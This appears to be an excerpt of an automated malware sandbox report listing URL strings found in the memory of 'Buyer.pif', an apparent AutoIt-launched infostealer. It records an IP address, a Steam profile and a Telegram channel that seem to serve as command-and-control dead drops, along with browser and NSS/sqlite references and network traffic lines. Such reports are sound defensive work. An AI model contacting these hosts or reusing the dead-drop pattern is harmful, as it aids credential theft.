                    Source: Buyer.pif, 0000000B.00000002.2537708757.000000000425E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60GDGDGHJKontent-Disposition:
                    Source: HDGCAA.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                    Source: HDGCAA.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: HDGCAA.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: HDGCAA.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: BKFCAF.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                    Source: Buyer.pif, 0000000B.00000002.2536907553.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: HDGCAA.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Buyer.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: HDGCAA.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/IJKEBFBFHI
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
